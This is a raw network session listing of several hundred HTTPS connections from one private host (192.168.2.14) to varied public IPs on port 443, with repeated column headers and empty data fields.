                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20634192.168.2.1437558132.14.199.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20635192.168.2.1440530150.39.70.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20636192.168.2.145160634.19.151.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20637192.168.2.1446692103.12.76.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20638192.168.2.1459066146.166.89.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20639192.168.2.143584874.97.136.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20640192.168.2.1440922152.96.22.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20641192.168.2.145040670.142.192.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20642192.168.2.145632223.111.146.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20643192.168.2.1444156137.230.202.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20644192.168.2.1459346125.215.45.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20645192.168.2.144405680.78.198.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20646192.168.2.144213894.149.11.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20647192.168.2.145291488.32.162.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20648192.168.2.144856060.79.214.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20649192.168.2.1443998104.19.178.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20650192.168.2.145623462.83.77.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20651192.168.2.144176858.86.88.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20652192.168.2.143305445.189.94.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20653192.168.2.145451232.66.236.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20654192.168.2.1441838211.226.112.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20655192.168.2.1443524168.127.192.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20656192.168.2.1435200101.218.100.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20657192.168.2.1459930174.193.169.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20658192.168.2.1456346203.252.119.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20659192.168.2.144450269.59.26.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20660192.168.2.145919491.109.68.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20661192.168.2.1438554160.96.52.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20662192.168.2.1452398109.229.245.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20663192.168.2.1458440195.98.238.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20664192.168.2.143924413.129.41.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20665192.168.2.1459642221.255.155.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20666192.168.2.144071272.61.161.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20667192.168.2.1459934159.7.133.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20668192.168.2.1443998181.88.132.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20669192.168.2.1440022174.178.168.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20670192.168.2.1437274184.33.37.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20671192.168.2.1450362168.62.114.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20672192.168.2.146070841.119.159.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20673192.168.2.143499067.18.220.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20674192.168.2.143451412.34.64.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20675192.168.2.143409073.2.88.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20676192.168.2.145347867.26.123.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20677192.168.2.1439974175.228.104.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20678192.168.2.1442252200.189.236.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20679192.168.2.1457088128.169.175.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20680192.168.2.1446424188.111.4.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20681192.168.2.14448722.255.239.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20682192.168.2.1454816133.239.41.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20683192.168.2.144705844.103.232.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20684192.168.2.1440184217.230.204.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20685192.168.2.1458710174.87.18.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20686192.168.2.1432968194.0.155.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20687192.168.2.1435258107.247.83.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20688192.168.2.1440400220.135.240.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20689192.168.2.145833417.149.199.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20690192.168.2.1445710176.251.0.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20691192.168.2.144888683.254.248.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20692192.168.2.145535019.234.130.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20693192.168.2.1434978154.113.230.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20694192.168.2.1452560110.251.224.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20695192.168.2.1458286170.121.59.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20696192.168.2.1439886132.86.126.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20697192.168.2.144837453.87.128.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20698192.168.2.1440964195.110.106.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20699192.168.2.145418096.196.145.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20700192.168.2.145639451.200.23.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20701192.168.2.143883083.186.54.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20702192.168.2.145469680.95.1.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20703192.168.2.1442896187.69.154.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20704192.168.2.145635849.198.232.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20705192.168.2.1452776194.129.27.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20706192.168.2.1447572151.68.254.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20707192.168.2.1454626101.14.221.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20708192.168.2.1441472200.186.53.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20709192.168.2.1460230185.181.96.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20710192.168.2.143374481.201.230.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20711192.168.2.1444900113.56.1.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20712192.168.2.144411478.35.171.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20713192.168.2.1457664216.102.118.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20714192.168.2.1440884173.9.75.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20715192.168.2.143793627.127.165.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20716192.168.2.1457236104.154.31.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20717192.168.2.1449502207.254.213.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20718192.168.2.145058443.127.99.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20719192.168.2.143549871.34.103.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20720192.168.2.1450018107.129.211.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20721192.168.2.145819283.109.106.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20722192.168.2.1432784216.210.80.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20723192.168.2.1447570209.28.145.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20724192.168.2.1440492205.120.190.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20725192.168.2.1457318192.66.100.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20726192.168.2.1434738107.59.16.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20727192.168.2.144849065.42.229.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20728192.168.2.1449790206.113.235.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20729192.168.2.144216260.63.157.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20730192.168.2.1447918132.135.38.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20731192.168.2.1458372203.230.172.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20732192.168.2.144665888.73.177.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20733192.168.2.143892078.115.106.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20734192.168.2.1438208211.94.28.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20735192.168.2.143676247.95.186.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20736192.168.2.1449998142.128.194.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20737192.168.2.1459420222.26.253.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20738192.168.2.1442734129.201.47.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20739192.168.2.144621265.63.117.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20740192.168.2.1433604157.161.118.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20741192.168.2.1450092209.186.172.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20742192.168.2.143285237.172.77.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20743192.168.2.1448338139.101.18.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20744192.168.2.1439148208.32.95.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20745192.168.2.1446670116.201.10.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20746192.168.2.143756691.115.46.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20747192.168.2.145756876.204.18.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20748192.168.2.144205682.18.54.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20749192.168.2.144613036.46.8.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20750192.168.2.144291839.10.39.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20751192.168.2.14558982.66.129.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20752192.168.2.1443128117.102.9.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20753192.168.2.1438248176.229.130.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20754192.168.2.143640219.33.153.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20755192.168.2.145928485.243.209.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20756192.168.2.1451884116.248.218.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20757192.168.2.1458092117.68.148.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20758192.168.2.144450643.68.182.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20759192.168.2.1433934125.162.91.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20760192.168.2.1437242170.193.236.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20761192.168.2.144630417.117.139.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20762192.168.2.1453944168.135.23.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20763192.168.2.1444796177.246.52.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20764192.168.2.1449402202.22.131.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20765192.168.2.1440478206.166.223.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20766192.168.2.1434100178.167.83.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20767192.168.2.1433092186.141.96.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20768192.168.2.144343467.174.141.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20769192.168.2.143483699.95.16.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20770192.168.2.1436374185.243.9.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20771192.168.2.1454062188.30.194.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20772192.168.2.1434294182.10.30.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20773192.168.2.145358888.89.169.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20774192.168.2.1439750162.199.231.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20775192.168.2.145422852.23.31.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20776192.168.2.145599682.7.2.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20777192.168.2.143603466.49.44.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20778192.168.2.144943049.121.237.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20779192.168.2.1436146151.178.71.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20780192.168.2.144231497.78.161.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20781192.168.2.1438358151.111.184.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20782192.168.2.1442520121.78.49.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20783192.168.2.1434938101.91.90.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20784192.168.2.1441958198.207.156.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20785192.168.2.145702473.32.27.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20786192.168.2.1455206168.136.8.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20787192.168.2.1454780152.166.46.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20788192.168.2.1460756118.203.100.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20789192.168.2.144338843.181.41.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20790192.168.2.1434442212.136.85.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20791192.168.2.1457692198.21.69.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20792192.168.2.1442494109.66.203.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20793192.168.2.1452656157.187.158.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20794192.168.2.1455594217.164.126.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20795192.168.2.1438198185.133.34.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20796192.168.2.1440396117.226.200.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20797192.168.2.1441372117.243.180.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20798192.168.2.1459636159.99.58.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20799192.168.2.145784481.84.246.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20800192.168.2.143325690.128.104.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20801192.168.2.1442712199.130.48.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20802192.168.2.144705063.58.166.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20803192.168.2.1436418143.236.102.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20804192.168.2.1441682114.46.113.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20805192.168.2.1435508161.27.112.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20806192.168.2.1448266182.77.43.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20807192.168.2.144121254.176.183.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20808192.168.2.1459002113.21.174.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20809192.168.2.1459630194.58.134.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20810192.168.2.1436710113.18.79.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20811192.168.2.1455538116.173.18.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20812192.168.2.1437784193.201.108.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20813192.168.2.144281883.92.165.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20814192.168.2.1449714145.239.50.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20815192.168.2.14519748.47.24.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20816192.168.2.1436206119.114.222.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20817192.168.2.1436788219.86.218.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20818192.168.2.1433728147.88.229.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20819192.168.2.1436538108.14.47.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20820192.168.2.1456438112.27.159.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20821192.168.2.145677474.55.35.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20822192.168.2.1460334167.76.198.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20823192.168.2.145835494.195.220.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20824192.168.2.145280457.16.160.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20825192.168.2.1440614125.160.160.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20826192.168.2.145750866.210.141.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20827192.168.2.1457102192.98.127.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20828192.168.2.144258291.44.180.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20829192.168.2.1445628115.250.159.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20830192.168.2.1445322170.24.29.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20831192.168.2.1451212119.226.97.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20832192.168.2.143970420.214.74.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20833192.168.2.14349188.131.140.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20834192.168.2.143408431.155.170.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20835192.168.2.1439952178.206.41.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20836192.168.2.1438020104.79.206.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20837192.168.2.1459544148.142.111.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20838192.168.2.143422254.174.241.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20839192.168.2.1457280197.169.117.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20840192.168.2.1458294219.96.8.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20841192.168.2.1456144117.183.226.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20842192.168.2.1456878199.32.213.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20843192.168.2.1458854131.52.30.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20844192.168.2.1460738125.62.61.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20845192.168.2.1455308180.241.69.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20846192.168.2.144375239.73.100.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20847192.168.2.145110295.167.200.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20848192.168.2.1456236160.40.42.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20849192.168.2.143327017.18.133.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20850192.168.2.1442642161.75.115.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20851192.168.2.14572584.194.51.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20852192.168.2.1453938152.53.77.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20853192.168.2.145050896.252.36.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20854192.168.2.1449900122.180.250.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
